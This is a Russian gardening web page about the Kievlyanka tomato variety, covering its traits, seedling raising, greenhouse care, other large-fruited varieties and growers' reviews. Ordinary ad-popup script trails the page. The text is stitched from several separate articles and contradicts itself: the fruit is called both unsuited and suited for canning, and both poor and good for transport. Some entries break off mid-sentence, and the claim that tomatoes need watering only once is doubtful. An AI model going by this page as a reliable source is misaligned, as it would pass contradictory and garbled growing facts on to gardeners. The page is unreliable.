12 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат киевлянка отзывы фото описание

Сортовая характеристика томата Киевлянка

Томат Киевлянка порадует огородников красивыми, крупными и сладкими плодами. Сорт относится к среднепоздним, но обладает изумительным вкусом и отличной урожайностью. Чтобы вырастить здоровую культуру и получить хороший урожай, полезно узнать ее характеристики, особенности агротехники.

Сортовая характеристика томата Киевлянка

Краткая информация о сорте

  • Плоды и куст: помидоры малиново-розового цвета, сердцевидно-кубовидной формы, массой от 200 до 500 г; куст индетерминантный, высотой от 150 до 250 см.
  • Урожайность: выше средней (5-6 кг с куста).
  • Устойчивость к заболеваниям: средняя, требует профилактики.
  • Распространение: на юге можно выращивать в открытом грунте, в средней полосе – в теплицах.
  • Применение: салаты, нарезка, вторые блюда, переработка.
  • Посадка: рассадным способом, посев – в начале или середине марта, пересадка в теплицу – в первой декаде мая; схема посадки – 50×50 см.
  • Почва: легкая, нейтральная.
  • Уход: полив – раз в неделю, подкормки – 5-6 раз за сезон, формирование – в 1-2 стебля, подвязывание к опоре – обязательно.
  • Период созревания: среднепоздний – помидоры созревают через 115-130 дней после появления всходов. В прохладном помещении плоды могут храниться в течение месяца.

Характеристика сорта

Срок созревания томатов Киевлянка среднепоздний (через 115-130 дней после образования всходов).

Описание куста

Куст относится к индетерминантному типу и вырастает до 150-250 см. Облиственность томата средняя. Плоды завязываются по 4-6 штук в кисти.

Описание плодов

Помидоры обладают красивым малиново-розовым цветом и крупным размером – от 200 до 500 г (отдельные плоды могут достигать гораздо большего веса – до 1 кг). Форма томатов Киевлянка сердцевидно-кубовидная. Мякоть мясистая, с небольшими пустотами. Вкус насыщенный, сладкий.

Область применения плодов

Плоды хороши в нарезках и летних салатах. Согласно описанию сорта Киевлянка, для консервирования и засолки они не подходят. Помидоры можно использовать для приготовления вторых блюд (тушить или запекать), а также – для переработки (соки, кетчупы, пасты).

Урожайность

Характеристики урожайности выше средних. С одного куста собирают 5-6 кг плодов. Для повышения этих показателей помидоры выращивают в теплице, формируют куст в 1-2 стебля, регулярно делают подкормки.

Устойчивость к болезням и вредителям

Томаты сорта Киевлянка болеют не часто, но требуют обязательной профилактики (соблюдения севооборота, контроля влажности, формирования кустов, рыхления почвы, прополки).

Из-за крупных и сладких плодов сорт может поражаться вредителями:

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Поражаемость сорта вредителями не зависит от размера и вкуса плодов, т.к. насекомые вредители питаются не плодами, а вегетативными частями растения — листьями, побегами.

Для профилактики атак белокрылки можно развесить липкие ленты; при первых признаках появления тли или клеща кусты промывают с мыльным раствором. При серьезных нашествиях используют инсектициды и акарициды.

Регионы выращивания

В Краснодарском крае, Астраханской и Волгоградской областях томат можно выращивать в открытом грунте. В средней полосе (Подмосковье) лучше высаживать культуру в теплицу. В третьей климатической зоне (Оренбургская область, Кировская, Иркутская и др.) сорт можно выращивать только в отапливаемых теплицах.

Выращивание рассады

Рассаду нужно закалять

Чтобы сделать пересадку в теплицу в первой декаде мая, семена на рассаду сеют в начале марта. Почву прокаливают в духовке или поливают кипятком для дезинфекции, а семена обрабатывают раствором марганцовки. Посев делают на глубину 0,5-1 см, увлажняют из пульверизатора и помещают под пленку.

До появления всходов температуру устанавливают в пределах 24-26 °С, а затем после появления всходов на одну неделю понижают до 16 °С (для лучшего укоренения).

После образования двух настоящих листьев томаты пикируют в отдельные емкости. Поливают их раз в неделю, ориентируясь при этом на состояние почвы.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Если рассада стоит на южном окне или лоджии, то стаканчики с землей пересыхают очень быстро. В таком случае поливают ежедневно, а иногда и 2 раза в день — утром и вечером.

За 2 недели до пересадки начинают закаливать растения. В погожие дни горшки выносят на улицу: первое время рассаду держат там 30-40 мин., затем постепенно увеличивают период закалки.

Пересадка и уход

Почву на грядке заранее удобряют перепревшим навозом, перекапывают и рыхлят. Для дезинфекции можно полить верхний слой грунта раствором марганцовки. Для последующей подвязки устанавливают шпалеру.

Лунки размещают по схеме 50×50 см. В каждую кладут горсть золы, яичную скорлупу и 1 ч. л. суперфосфата, заливают теплой водой (1-1,5 л).

Сразу после пересадки помидоры Киевлянка можно обработать бордоской жидкостью для профилактики фитофторы. Через 2-3 недели кусты подвязывают к шпалере. Формирование проводят в 1-2 стебля. Подкормки вносят 5-6 раз за сезон, чередуя органические удобрения (перепревший навоз, птичий помет, настой травы) с минеральными комплексами.

Полив делают раз в неделю, после чего рыхлят землю на грядке и проветривают теплицу.

Типичные ошибки при выращивании

У некоторых огородников данный сорт давал поздние завязи, начиная формировать плоды к концу июля. Ошибочно полагая, что урожая уже не будет, овощеводы собирались выдернуть кусты, но буквально через пару дней томат стал обильно завязывать плоды и в результате отлично плодоносил.

Ошибкой будет подвязывание только стеблей, поскольку плодовые кисти под тяжестью крупных помидоров часто обламываются. Даже при простом заломе плоды на ветке могут не созреть.

К частым ошибкам относится чрезмерный полив томатов Киевлянка. Излишки влаги способствуют возникновению грибных заболеваний, иногда они негативно сказываются на вкусе плодов (помидоры становятся водянистыми). Стандартная норма полива – одно ведро на три томатных куста.

Описание и характеристика томатов сорта Киевлянка

Томаты по своему происхождению субтропические растения, поэтому на открытом пространстве их можно выращивать исключительно в регионах с теплыми климатическими условиями, во всех прочих, допускается только тепличный (рассадный) способ. Помидоры – один из самых любимых овощей, домохозяйки могут сделать из него сотню разных блюд и салатов, соответственно многие огородники, стараются высадить на своем участке как много больше разных сортов, чтобы получить богатый урожай. Томат Киевлянка — один из любимых сортов, который выбирают из-за высокого показателя урожайности, а также из-за непревзойденных вкусовых характеристик.

Описание и характеристика томатов сорта Киевлянка

Сортовые особенности

В списке самых популярных сортов часто встречается описание томата киевлянка, т. к. они имеет уникальные характеристики, в сравнении с другими представителями культуры:

  1. Куст относят к индетерминантным растениям (то есть таким, которые не перестают расти).
  2. В среднем высота куста составляет 1,7-1,8 м., но как показывают отзывы овощеводов, у некоторых куст дорастал до 2,5 м.
  3. Листья – обычные, средне – крупных размеров, темно – изумрудного окраса.
  4. Плодоножка не имеет пятен.
  5. Томаты этого сорта имеет обыкновенный тип соцветия.
  6. Как показывает описание томата киевлянка, плоды крупных размеров средний показатель веса 300-500 гр., если придерживаться основных правил выращивания помидора, то можно вырастить плод весом в 1000 гр.
  7. «Киевлянка» богата на витамины, антиоксиданты и минералы. Поэтому употребление их в пищу поможет предотвратить развитие заболеваний сердечно-сосудистой системы, вдобавок помидоры богаты на витамин А и органические кислоты, что благоприятно влияет на зрение.
  8. Незрелые томаты, светло – зеленого цвета, как только начинается дозревание то в тепличных условиях они стают розовыми, с неким оранжевым вкраплением. Если же растение выращивают на открытом пространстве с нормальным количеством света и теплым климатом, то помидоры этого сорта приобретают малиновый окрас.
  9. У этого сорта высокие показатели урожайности.

Помидоры подходят для домашней закрутки, домохозяйки предпочитают из киевлянки делать сок. Если выбирать исключительно спелые плоды, то он будет иметь медовый привкус. Во время переработки можно заметить, что внутри плода есть небольшие пустоты, это объясняется особенностями этого вида томатов, но данный факт никак не влияет на другие параметры плодов.

Характеристика Киевлянки

Согласно описанию «Киевлянка» плохо переносят температурные изменения, соответственно культура не подойдет для выращивания на открытом пространстве в местности, где есть резкие перепады температуры или сильные дожди. С учетом этих особенностей, начало выращивания припадает на середину апреля – первую декаду мая. Это среднепоздний тепличный сорт. Посев семян на рассаду выполняют за 2-2,5 месяца до предполагаемой высадки в грунт. Лучше всего чтобы плоды дозревали на кусте, так как они могут увеличиваться в размерах. Данный сорт не особо хорошо переносит транспортировки на большие расстояния. В овощехранилищах с нормальными (стандартными) условиями он может храниться 1 – 2 месяца, не больше, ведь со временем помидор начинает портиться и гнить.

Для того чтобы по максимуму использовать плоды, их нужно собирать в состоянии полной спелости. Если овощевод сорвал недозревшие томаты, то их можно оставить на несколько дней для дозревания. В таком случае он приобретет розовый оттенок.

Особенности выращивания и последующий уход за растением

При выращивании рассады чётко придерживайтесь правил

Эти помидоры имеют некоторые особенности выращивания, но весь процесс производства под силу даже малоопытным овощеводами. Главное условие успеха, четкое следование правил, тогда в конечном итоге, человек получит высокий показатель урожайности. Весь процесс состоит из нескольких этапов.

Первый этап – подготовка

Прежде чем сеять семена, необходимо хорошенько подготовить почву. Профессиональные овощеводы, для этих целей рекомендуют использовать смесь состоящую из самой обыкновенной садовой земли, но ее дополняют специальными удобрениями (аммиачные, фосфатные добавки или древесная зола) и животным перегноем.

Некоторые огородники в грунт добавляют табак или табачную пыль, которая богата на фосфор, калий и азот. Подготовительный этап касается и семян, перед тем как высаживают их необходимо замочить в специализированном растворе (калий перманганат разводится с водой).

Этап – взращивание рассады

После того как были проведены все приготовления, семена высаживают в грунт. Одни производители предварительно обильно заливают землю водой, но как показывает практика лучше, когда высадка будет проводиться во влажную землю, и спустя некоторое время можно по немного орошать росточки. Глубина посадки семян 1,5 – 2 см. Если емкость с грунтом для рассады находится в теплице, а не как вариант в доме, тогда для улучшения условий грунт прикрывают пленкой.

Как только начали появляться первые ростки, помидоры необходимо переставить в место, где есть хорошее освящение. Эти кусты нуждаются в достаточном количестве тепла и света, на первых этапах для этого подходят люминесцентные лампы, но вполне достаточно, если емкость переставляют поближе к солнечному свету.

Пикировка и сопутствующие ей процедуры

Когда на томате появляются полноценные небольшие листочки, нужно проводить пикировку (рассаживание по отдельным емкостям, это могут быть стаканчики). Все они собираются в большой ящик, устанавливая друг около друга, тогда можно будет наблюдать, и сравнивать развитие рассады.

Для характеристики урожая подходит слово реса, то есть овощевод получает великое множество плодов.

Поэтому для того чтобы выровнять соотношение количество томатов и зеленой массы на кусте выполняют пасынкование. Это помогает отрегулировать нагрузку на ветви, так как удаляют ненужные побеги в пазухах листов. Процедура проводится во время пикировки, когда рассада меньше 10 сантиметров. Если проводить пасынкование позже, то есть вполне реальная возможность нанесение травмы растению, после чего снижается показатель урожайности.

Высадка рассады

Все кто ранее занимался разведением этого сорта, знают, что куст имеет большие размеры, поэтому минимально позволительное расстояние между кустами в 50 см. Желательно чтобы и междурядье было приблизительно на таком же расстоянии.

Томат Киевлянка: характеристика сорта, его преимущества и недостатки

В теплицах российских овощеводов томат Киевлянка уже давно занимает достойное место. Этот сорт один из излюбленных среди огородников-любителей и крупных фермеров. Гигантские плоды и неприхотливость делают растение востребованным видом семейства пасленовых.

Сортовые особенности

Среди знаменитых урожайных сортов часто встречается описание и фото томата Киевлянка, так как он имеет уникальные свойства, а именно:

  1. Кусты помидоров относят к индетерминантным растениям. Это означает, что в течение всей жизни растение не останавливается в росте.
  2. Высота куста составляет 1,5-2 м. Судя по отдельным отзывам овощеводов, помидорный куст дорастает и до 2,5 м.
  3. Листья у томата Киевлянка обычные, средне-крупных размеров и окрашены в темно-изумрудный цвет.
  4. На плодоножке нет пятен.
  5. Помидоры этого сорта характеризуются обыкновенным типом соцветия.
  6. Отзывы фермеров показывают, что плоды томатов крупные. Масса одного составляет 300-500 грамм. Получить хороший урожай реально лишь в тех случаях, если придерживаться советов овощеводов и стандартных правил выращивания помидор.
  7. Овощи богаты на витамины, минералы и антиоксиданты. Поэтому их частое употребление в пищу минимизирует риск развития болезней сердечно-сосудистой системы. Также помидоры богаты на витамин А и органические кислоты, что положительно влияет на зрение.
  8. Незрелые томаты обладают светло-зеленым оттенком. В процессе созревания в тепличных условиях они приобретают розовый окрас, с небольшим оранжевым вкраплением. Если же растение выращивают в местах с теплым климатом, в открытом грунте и с нормальным количеством света, то помидоры могут становиться малинового оттенка.
  9. У томата Киевлянка высокие показатели урожайности.

Применение помидоров

Овощи отлично подходят для домашней закрутки. Часто можно встретить в рецептах домашнего сока использование томата Киевлянка. Выбирая для этого только спелые плоды, сок будет обладать медовым привкусом. При его переработке можно заметить, что внутри помидора имеются небольшие пустоты. Это основное отличие этого вида томатов от других сортов. Данный факт вообще не влияет на вкус и другие важные свойства плодов.

Характеристика Киевлянки

Судя по описанию и фото, томаты Киевлянка плохо переносят резкие температурные перепады, поэтому культуру овощеводы не советуют использовать для выращивания на открытом пространстве или в местности, где могут быть ветры и сильные дожди. Учитывая все эти особенности, начало выращивания выпадает на середину апреля – первую часть мая. Помидоры являются среднепоздним тепличным сортом. Посев семян для формирования рассады осуществляют за 8-10 недель до предполагаемой высадки молодых растений в землю. Конечно же, лучше всего чтобы плоды дозревали самостоятельно на кусте, так как они могут значительно увеличиваться в размерах. Томаты Киевлянка сберегаться могут в овощехранилищах с нормальными условиями около 1–2 месяца и не более. После этого они начинают быстро портиться и гнить.

Плоды следует собирать только при полной их спелости, чтобы максимально использовать урожай. В случае срывания зеленых помидоров, их можно оставить «отдохнуть» на несколько дней для созревания при комнатной температуре. Уже поспевшие томаты приобретают красивый розовый оттенок.

Достоинства и недостатки сорта Киевлянка

К положительным характеристикам относят следующее:

  1. Отличные вкусовые качества.
  2. Высокий урожай.
  3. Плоды обладают крупными размерами.
  1. Если вы надумали перевозить спелые плоды на дальние расстояния, то это — плохая идея, так как помидоры плохо переносят транспортировку.
  2. Выращивать томаты в холодных регионах РФ не получится – урожайность будет низкой.

Помидоры Киевлянка – это действительно уникальный сорт, который позволит наслаждаться сладкими и красивыми помидорами. Отзывы о томате Киевлянка гласят, что это один из самых рекомендуемых для выращивания сортов, которые выгодно отличаются высокой урожайностью.

Томат Киевлянка: характеристика сорта, его преимущества и недостатки

Бельмонте (Belmonte)

Томат сорта Belmonte, фото Людмилы Ди

Очень высокие и мощные кусты (выше 2 м), лучше всего растут в теплице, формируются в два стебля. Все плоды равномерно крупные, не склонны к заболеваниям, сладкие. Но у разных производителей можно встретить этот сорт с красной и розовой окраской. Несмотря на разницу в цвете размеры томатов не меняются и достигают 800 г для первых плодов и 500 – для последних на кусте.

Болгарское чудо

Томат сорта Болгарское чудо, фото Федора Титова

В ярко-розовых крупноплодных томатах мало семян. Сорт очень урожаен и устойчив к плохой погоде. Даже в дождливое и холодное лето с куста можно собрать несколько килограммов плодов, а в хорошую погоду счет идет на десятки килограммов. Растет и в открытом, и в закрытом грунте, формируется в два ствола. Единственный минус – семена порой туговсхожие.

Ваше благородие

Томат сорта Ваше благородие, фото Ирины Павлив

В теплице кусты этого сорта вырастают выше 2 м, а в открытом грунте – до полутора. Сочные плоды хороши для салатов, однако их шкурка твердовата. В жаркое лето будут сладкими, а в дождливую погоду – с кислинкой. Независимо от температуры плоды огромны, хотя заявленного килограмма почти не достигают. Зато сохраняется размер плодов и на верхних кистях.

Томат ‘Гордость застолья F1’

Это участник конкурса «100 000 рублей за самый большой помидор» на нашем сайте.

Томат ‘Гордость застолья’, фото Татьяны Анисимовны

Индетерминантный гибрид высотой 1,8 м. Раннеспелый (90-105 суток). Плоды розово-малиновые, плоскоокруглые, массой 400 г и более. У Татьяны Анисимовны (пользователя нашего сайта) самый крупный плод весил 543 г!

Ее рекордсмен, фото Татьяны Анисимовны

Выращивают в 2 стебля в коловой и шпалерной культурах, в открытом грунте (на юге) и в теплицах средней полосы России. Устойчив к томатным болезням.

Мишка косолапый желтый

Томат сорта Мишка косолапый желтый, фото Марины Башаровой

«Мишки» есть разных цветов и все они дают плоды по 800-1000 г, а есть и уникумы до полутора кг. Только салатные, конечно, но одним помидором можно наесться вдвоем. Почти не болеют, плодоносят до начала октября. Выращивать лучше в высокой теплице, потому что кусты очень мощные и нуждаются в пространстве.

Розовый гигант

Томат сорта Розовый гигант, фото Светланы Полупановой

Плоды вырастают крупными, но на кусте их не больше десятка. Созревать начинают довольно поздно (по сравнению с другими), часто растрескиваются у плодоножки и очень плохо хранятся. Подходят для приготовления салатов и соков, растут и в теплице, и в открытом грунте. Можно формировать в 2-4 стебля, но обязательно нужно подвязывать.

Сокровище инков

Томат сорта Сокровище инков, фото Тамары Гореловой

Семена туговсхожи (всходят 2-3 семечка из 5), кусты растут крупными, формируют их в 2 стебля. К сожалению, плоды хоть и крупные, но часто с невыразительным вкусом, с твердым основанием и мягкой кожицей. Хороши, скорее, своим внешним видом и необычными разводами в мякоти, чем вкусовыми качествами.

Томат ‘Медвежья лапа’

, гвоздикой, корицей, имбирем, свежими листьями

Спринт таймер

Томат сорта Спринт Таймер, фото Раисы Явтушенко

Кусты до 2,5 м, самые крупные плоды – более 700 г. Формируют кусты в 1-2 стебля и обязательно подвязывают к опорам. Плоды вкусные, сахаристые и очень обильные. С 20 кустов можно снять 8 ведер – и это не предел в хорошее лето.

Томат ‘Райское наслаждение’

Вот такие красновато-розовые салатные томаты-великаны особенно хороши на юге, где они набираются жаркого солнца и становятся необыкновенно ароматными и вкусными! Они настолько изысканны сами по себе, что их можно только испортить добавлением

. Несмотря на самодостаточность, они прекрасно сочетаются с

, беконом, белой рыбой, болгарским

Сызранская роза

Томат сорта Сызранская роза, фото Анатолия Силина

Сорт склонен к растрескиванию и неравномерному созреванию, однако за его вкус ему можно простить что угодно. Кусты в теплице вырастают до 1,8 м, формируют их в 1-2 стебля, обязательно часто поливают или мульчируют. Кожура у плодов тонкая, легко повреждается, мякоть сахаристая и очень ароматная.

Шунтукский великан

Томат сорта Шунтукский великан, фото Маргариты Жевлаковой

Начинает плодоносить одним из первых, заканчивает уже по холодам, при этом очень устойчив к болезням. Плоды набирают в среднем по 600 г, причем они очень вкусные и ароматные. Зеленые томаты хорошо дозариваются, а кусты можно растить и в открытом грунте, правда, тогда они будут чуть выше метра высотой.

Томат ‘Царь колокол’

Для тех, кто не любит индетерминантные лиановидные сорта и гибриды, но хочет получить крупные вкусные плоды без установки опор, подвязки, пасынкования, подойдет этот сибирский сорт. К нам в гости прошлым летом приезжали родственники из Испании: они перепробовали все помидоры с грядки и выбрали именно этот сорт для приготовления простого каталонского блюда под названием

. На поджаренный хлеб, натертый чесноком, они выдавили свежий сок и разложили мякоть томатов (без кожицы), сверху это полили оливковым маслом и посыпали солью. Это было божественно вкусно!

Японский краб

Томат сорта Японский краб, фото Федора Титова

Привлекает не только размером, но и необычной формой, и урожайностью. Как и многие крупноплодные, не слишком лежкий, нужно съедать или перерабатывать быстро, потому что кожица тонкая. Мякоть нежная, сахаристая, но при неправильном уходе от плодоножки в центр растет белый плотный стержень, ощущающийся как недозрелая мякоть. На первых кистях плоды 700-900 г, затем постепенно мельчают до 300 г.

Советы по выращиванию крупноплодных томатов

Для того, чтобы вырастить крупноплодный томат, следует помнить о некоторых особенностях сортов:

  1. Большинство томатов с крупными плодами имеют высокорослые кусты, больше напоминающие лианы. Некоторые стебли превышают 2 метра в высоту. Описание высокорослых сортов томатов можно прочесть тут .
  2. Крупноплодные сорта обычно очень вкусные и сочные. Из них легко готовить любое блюдо или употреблять в первоначальном виде.
  3. Как правило, такие сорта имеют тонкую кожицу , которая легко удаляется.

Особенности посадки и ухода:

  1. Высаживать томаты строго в соответствии с их типом. Первыми — позднеспелые томаты в конце февраля, затем среднепоздние и среднеспелые – в середине марта. Часто огородники ориентируются на лунный календарь посадки на рассаду .
  2. Рассаду ранних сортов следует выращивать под специальными лампами. Иначе может быть задержка в росте и образовании цветочных бутонов.
  3. Высадка в теплицу производится в конце апреля (если теплица обогреваема) и в мае (если теплица не обогреваемая).
  4. Высокорослые растения следует подвязывать посредством свободной петли.
  5. Обязательное пасынкование и формирование куста в один или два стебля. Иначе крупного урожая не получить.
  6. Следует строго следить за температурой и влажностью в теплице, а также соблюдать правила подкормки.
  7. Ограничение и прищипывание верхушки основного стебля после того, как он достаточно вырос.

Примерная схема размещения овощных и зеленых культур для выращивания рассады на лоджии или балконе

Понравились огромные томаты? Тогда почитайте еще и советы опытного томатовода Юрия Кузьминых о том, как вырастить огромные помидоры грамотно и без лишних усилий.

«Не существует огородника, который бы не мечтал вырастить самую большую тыкву, кабачок, помидор либо другой овощ».

Сорт или гибрид?

На самом деле, более крупные плоды всегда сочнее и вкуснее. Что определяет крупноплодность томата? Конечно, это в первую очередь сорт. Гибридные томаты не имеют таких размеров. Там и не ставится такая задача. Хотя есть отдельные представители, которые вырастают до очень приличных размеров.

Все ясно. Выбрали крупноплодный сорт и начали выращивать. Но часто результат далек от ожидаемого. Почему?

Сначала о сортах. У меня есть несколько томатов, которые могут выдать плоды массой ближе к 1 кг и более:

  • Спринт Таймер;
  • Гигант Бельгии;
  • Минусинский;
  • Болгарское чудо;
  • Бычье Сердце Рыбного озера;
  • Розовая Бригадель;
  • Рим;
  • Скорпион;
  • Армянский биколор.

В этих сортах заложена крупноплодность, а значит, результат будет зависеть уже только от нас с вами. Чтобы получить по-настоящему крупные плоды, кроме обычных рекомендаций, нужно понять три момента:

  1. Сможете развить хорошую корневую систему – значит, полдела уже сделано.
  2. Урожай необходимо формировать.
  3. Без качественного питания томат не достигнет заявленных производителем размеров.

Для начала разберемся с корневой системой. Здесь нужно начинать с рассады и идти по нарастающей, чтобы прирост новых корешков шел постоянно, не останавливаясь.

На стадии рассады важно помнить о подсушивании, ведь в это время корешки стараются найти все капли влаги в стаканчике, а значит, растут. Также необходимо осуществить две-три перевалки в более просторные горшки, иначе рост корневой затормозится, и потом дать новый толчок будет сложнее.

При высадке в грунт важна теплая почва, причем на максимально возможной глубине. В холодной почве (весной даже в тепличке она всегда холодная) рост корешков минимальный, а стебель в теплом воздухе продолжает расти, и возникает дисбаланс в развитии – верх перегоняет низ.

Теперь кое-что важное о поливе, точнее о его отсутствии. Поливать томаты нужно только один раз – во время высадки рассады на постоянное место, а затем о лейке стоит забыть. По мере отступления влаги из верхних слоев почвы, корни будут активно расти и в стороны, и вниз (опять же, если почва теплая, в холодную они не полезут, и растение начнет просто вянуть).

Формировка урожая

Для томатов крупноплодных сортов, особенно при неблагоприятной весенней погоде, свойственна перегрузка первых кистей урожаем. Это может привести к остановке роста корневой системы, а значит, лишит нас надежд на обильное и продолжительное плодоношение куста.

Резервы урожайности томатов – как изменить в свою пользу

Как получить больше помидоров, чем обычно, не меняя количество кустов и размер теплицы? Рассказывает опытный томатовод Юрий Кузьминых.

Чтобы избежать этого, нужно оставить на первой кисти только 3-4 плода, причем сделать это вовремя. Как только на кусте появятся маленькие завязи, все лишнее срежьте ножницами без жалости.

Сомневаетесь в действенности этого метода? Проведите эксперимент:

  1. Посадите три растения одного крупноплодного сорта.
  2. У первого растения уберите всю завязь на первой кисти.
  3. У второго уберите и первую, и вторую кисть.
  4. А третий оставьте, как есть.
  5. Посмотрите, на каком растении будут самые крупные плоды.

Питание томатов

Теперь, когда мощная корневая система, как насос, поставляет томату влагу и питание, для получения крупных и качественных плодов осталось сделать всего одно. Что же? Обеспечить томату полноценный набор питательных веществ.

Ведь без питания растению нечем будет прокормить и наполнить плоды, а значит, вместо помидора в 800 г вы получите от силы 300 г.

Схема превращения азота в питательные вещества

Любой плод – это в первую очередь белки, которые состоят из аминокислот и образуются лишь при наличии азота. Именно в момент роста плодов куст должен активно подпитываться азотом и другими элементами питания. Без внесения комплексных удобрений куст будет голодать и не даст желаемого результата.

Этапы развития томатного растения – когда и чем подкармливать помидоры

Секретами подкормок томатов на разных этапах их развития делится опытный томатовод. Удобряйте растения правильно!

Описание крупноплодного сорта томата Киевлянка и его урожайность

На грядках российских садоводов помидоры уже давно занимают достойное место. Томат Киевлянка один из излюбленных сортов среди овощеводов. Гигантские плоды и неприхотливость вывели растение в число наиболее востребованных видов семейства пасленовых.

Информация о сорте

Сорт украинской селекции стабильно плодоносит в теплицах и условиях открытого грунта. Характеристика и внешний вид растения:

  • Среднепоздний, ягоды начинают созревать через 130 дней;
  • Индетерминантный;
  • Высокорослый, рост томата в теплице может достигать двух метров;
  • Средняя облиственность кустов;
  • Листья светло-зеленого цвета;
  • Крупноплодный;
  • Высокая урожайность;
  • Неприхотлив;
  • Не склонны к растрескиванию;
  • Устойчивость к большинству заболеваний пасленовых;
  • Количество завязей в кисти до 6 штук;
  • Переносит транспортировку, без потери товарного вида;
  • Хорошая лежкость.

Отзывы дачников и фермеров подтверждают успешное культивирование растения за пределами родины. В России растение предпочтительно выращивать в парниковом укрытии или теплице. Технические данные и описание плодов:

  • сердцевидно-кубовидная форма;
  • максимальный вес ягоды 1 килограмм;
  • сочные;
  • сладкий вкус;
  • малиново-розовый цвет в зрелом состоянии;
  • мясистые;
  • внутренность с небольшими пустотами;
  • средняя плотность.

Помидор подходит для переработки. Из сорта Киевлянка получают томатную пасту, кетчуп, соусы и пюре. Входит в число сортов салатного назначения. Не подходит для консервирования или закруток.

Рекомендации по выращиванию

Как и большинство томатов, для растения предпочтителен рассадный метод посадки. Сильные саженцы служат залогом получения хорошего урожая. Советы по выращиванию рассады:

  • подготовить емкость с универсальной почвой для томатов;
  • посеять семена на глубину 1-2 сантиметра;
  • после посева увлажнить почву, использовать пульверизатор;
  • накрыть емкость с рассадой пленкой;
  • после появления ростков пересадить томаты по отдельным емкостям, например, торфяным горшкам;
  • поддерживать температурный режим в помещении не ниже плюс 22 градусов;
  • первые ростки требуют большого количества света, минимум 12 часов солнечного света;
  • регулярный полив;
  • закаливание перед высаживанием.

ВАЖНО! Томат показывает лучшую урожайность при формировании куста в 1-2 стебля.

Растение предпочитает простор, на одном квадратном метре земли не следует располагать больше 4 кустов. В число правил по уходу входит:

  • Подкорм комплексным минеральным удобрением, до 6 раз за сезон;
  • Полив, по мере необходимости;
  • Рыхление земли;
  • Уборка сорняков;
  • Подвязывание к шпалере синтетическими тканями;
  • Установка опоры;
  • Частое проветривание теплицы.

Мнение садоводов

Всем доброго времени суток. Любителям крупноплодных томатов советую сорт Киевлянка. Томат показывает высокую урожайность в северо-западном регионе, при условии выращивания в тепличных условиях. Удалось получить отдельные ягоды весом в 800 грамм. Плоды не водянистые, сочные, сладкие. Советую!

Екатерина Неганова, 55 лет.

День добрый! Томат сорта Киевлянка порадовал большими плодами, весом до 1 килограмма. Для выращивания, в условиях умеренного климата, понадобится просторная, высокая теплица. Растение любит подкормы и обильный полив.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
